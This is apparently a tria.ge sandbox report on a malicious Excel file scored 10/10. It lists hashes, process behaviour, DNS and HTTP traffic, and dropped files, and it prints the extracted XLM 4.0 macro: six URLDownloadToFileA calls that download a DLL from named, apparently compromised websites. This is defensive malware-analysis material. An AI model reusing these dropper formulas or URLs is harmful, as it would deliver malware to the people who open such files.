Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21/11/2024, 00:17 UTC

General

  • Target

    65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4.xls

  • Size

    126KB

  • MD5

    fda0b9d321be17519d9edc011dc4b0a8

  • SHA1

    5c37cf50381e7b02f9ddcde6bc04805a71bce0a8

  • SHA256

    65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4

  • SHA512

    2e0d49366722a914c379c78157035c1316f8212e92edaec9df57ec100c47f3e3b3e43eff19e0d6a6a749a090fd34843a0b545144f642bd49fd9cf3850f39861c

  • SSDEEP

    3072:LsKpbdrHYrMue8q7QPX+5xtekEdi8/dgR3Syz+nzQIceCRlCd:QKpbdrHYrMue8q7QPX+5xtFEdi8/dgR8

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/", "..\fbd.dll")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://izytalab.com/includes/1mafAX0kOa/", "..\fbd.dll")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://pcsolutionss.com/zSlT4HR92TiOpw5NM/", "..\fbd.dll")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/", "..\fbd.dll")
5
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://wpl28.realtyna.com/wp-content/0b0ny5cPM/", "..\fbd.dll")
6
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://www.efcballjoint.com/Template/AxEZPOfAa9/", "..\fbd.dll")
URLs
xlm40.dropper

http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/

xlm40.dropper

http://izytalab.com/includes/1mafAX0kOa/

xlm40.dropper

https://pcsolutionss.com/zSlT4HR92TiOpw5NM/

xlm40.dropper

http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

xlm40.dropper

https://wpl28.realtyna.com/wp-content/0b0ny5cPM/

xlm40.dropper

http://www.efcballjoint.com/Template/AxEZPOfAa9/

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2344

Network

  • flag-us
    DNS
    med.devsrm.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    med.devsrm.com
    IN A
    Response
    med.devsrm.com
    IN A
    143.95.229.88
  • flag-us
    GET
    http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/
    EXCEL.EXE
    Remote address:
    143.95.229.88:80
    Request
    GET /wp-content/gtOOTHi3zkUbn8U6/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: med.devsrm.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 21 Nov 2024 00:17:51 GMT
    Server: Apache
    Vary: accept,content-type,Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <http://aleksasphotoblog.de/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Content-Encoding: gzip
    Keep-Alive: timeout=5, max=75
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    izytalab.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    izytalab.com
    IN A
    Response
  • flag-us
    DNS
    pcsolutionss.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    pcsolutionss.com
    IN A
    Response
    pcsolutionss.com
    IN A
    204.15.133.228
  • flag-us
    GET
    https://pcsolutionss.com/zSlT4HR92TiOpw5NM/
    EXCEL.EXE
    Remote address:
    204.15.133.228:443
    Request
    GET /zSlT4HR92TiOpw5NM/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: pcsolutionss.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 21 Nov 2024 00:17:56 GMT
    Server: Apache
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    www.doctorcasenave.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.doctorcasenave.com
    IN A
    Response
    www.doctorcasenave.com
    IN A
    172.67.203.60
    www.doctorcasenave.com
    IN A
    104.21.44.190
  • flag-us
    GET
    http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    EXCEL.EXE
    Remote address:
    172.67.203.60:80
    Request
    GET /wp-content/O2Z1HMebIXiHYBBS/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: www.doctorcasenave.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 21 Nov 2024 00:17:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Location: http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NsfV5OA%2B31ffY3vYmF4mudrBZdtTHxkpuuKuunAWaoyrYA5bKxMQBeIqZvkQhPg4TnOI6cBZnunmz6vWsxC0ob%2FK78qqMHxPKlCsq1JLM2bAxJkEVlDmqKnlgAqxLmHxFY8l6jKFk61V"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e5c7fe6c8533695-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=60445&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=349&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    DNS
    doctorcasenave.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    doctorcasenave.com
    IN A
    Response
    doctorcasenave.com
    IN A
    172.67.203.60
    doctorcasenave.com
    IN A
    104.21.44.190
  • flag-us
    GET
    http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    EXCEL.EXE
    Remote address:
    172.67.203.60:80
    Request
    GET /wp-content/O2Z1HMebIXiHYBBS/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: doctorcasenave.com
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 21 Nov 2024 00:17:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <http://doctorcasenave.com/wp-json/>; rel="https://api.w.org/"
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsYcPvUrMcWy3gQC5RPxBV2tCmrgb9VSHSmPsuj71jWALudVmkbU%2Bcy1q0%2B%2BJHr7lSwFOvjvtFySgol4wV%2FI%2Fis%2BojrP%2B2Yy7ZfT2Dpiaq3TmB2AyfXYELbT3im19n5wTuvO1yQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e5c7fea2e51ef54-LHR
    Content-Encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=60143&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=345&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    DNS
    wpl28.realtyna.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    wpl28.realtyna.com
    IN A
    Response
    wpl28.realtyna.com
    IN A
    54.173.39.27
  • flag-us
    DNS
    www.efcballjoint.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.efcballjoint.com
    IN A
    Response
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    95.100.245.144
  • flag-gb
    GET
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    Remote address:
    95.100.245.144:80
    Request
    GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1078
    Content-Type: application/octet-stream
    Content-MD5: PjrtHAukbJio72s77Ag5mA==
    Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
    ETag: 0x8DCFA0366D6C4CA
    x-ms-request-id: 7ca9c103-d01e-0016-3fee-2ba13d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Thu, 21 Nov 2024 00:18:26 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV3b45ffe8.0
    ms-cv-esi: CASMicrosoftCV3b45ffe8.0
    X-RTag: RT
  • 143.95.229.88:80
    http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/
    http
    EXCEL.EXE
    1.4kB
    28.7kB
    22
    24

    HTTP Request

    GET http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/

    HTTP Response

    404
  • 204.15.133.228:443
    https://pcsolutionss.com/zSlT4HR92TiOpw5NM/
    tls, http
    EXCEL.EXE
    1.2kB
    4.8kB
    11
    9

    HTTP Request

    GET https://pcsolutionss.com/zSlT4HR92TiOpw5NM/

    HTTP Response

    404
  • 172.67.203.60:80
    http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    http
    EXCEL.EXE
    625 B
    1.1kB
    6
    4

    HTTP Request

    GET http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

    HTTP Response

    301
  • 172.67.203.60:80
    http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    http
    EXCEL.EXE
    621 B
    4.2kB
    6
    5

    HTTP Request

    GET http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

    HTTP Response

    404
  • 54.173.39.27:443
    wpl28.realtyna.com
    tls
    EXCEL.EXE
    399 B
    179 B
    5
    4
  • 54.173.39.27:443
    wpl28.realtyna.com
    tls
    EXCEL.EXE
    361 B
    219 B
    5
    5
  • 54.173.39.27:443
    wpl28.realtyna.com
    tls
    EXCEL.EXE
    288 B
    219 B
    5
    5
  • 54.173.39.27:443
    wpl28.realtyna.com
    EXCEL.EXE
    190 B
    132 B
    4
    3
  • 95.100.245.144:80
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    http
    393 B
    1.7kB
    4
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

    HTTP Response

    200
  • 8.8.8.8:53
    med.devsrm.com
    dns
    EXCEL.EXE
    60 B
    76 B
    1
    1

    DNS Request

    med.devsrm.com

    DNS Response

    143.95.229.88

  • 8.8.8.8:53
    izytalab.com
    dns
    EXCEL.EXE
    58 B
    131 B
    1
    1

    DNS Request

    izytalab.com

  • 8.8.8.8:53
    pcsolutionss.com
    dns
    EXCEL.EXE
    62 B
    78 B
    1
    1

    DNS Request

    pcsolutionss.com

    DNS Response

    204.15.133.228

  • 8.8.8.8:53
    www.doctorcasenave.com
    dns
    EXCEL.EXE
    68 B
    100 B
    1
    1

    DNS Request

    www.doctorcasenave.com

    DNS Response

    172.67.203.60
    104.21.44.190

  • 8.8.8.8:53
    doctorcasenave.com
    dns
    EXCEL.EXE
    64 B
    96 B
    1
    1

    DNS Request

    doctorcasenave.com

    DNS Response

    172.67.203.60
    104.21.44.190

  • 8.8.8.8:53
    wpl28.realtyna.com
    dns
    EXCEL.EXE
    64 B
    80 B
    1
    1

    DNS Request

    wpl28.realtyna.com

    DNS Response

    54.173.39.27

  • 8.8.8.8:53
    www.efcballjoint.com
    dns
    EXCEL.EXE
    66 B
    139 B
    1
    1

    DNS Request

    www.efcballjoint.com

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    95.100.245.144

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabEE77.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarEEA9.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/2344-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2344-1-0x000000007284D000-0x0000000072858000-memory.dmp

    Filesize

    44KB

  • memory/2344-52-0x000000007284D000-0x0000000072858000-memory.dmp

    Filesize

    44KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.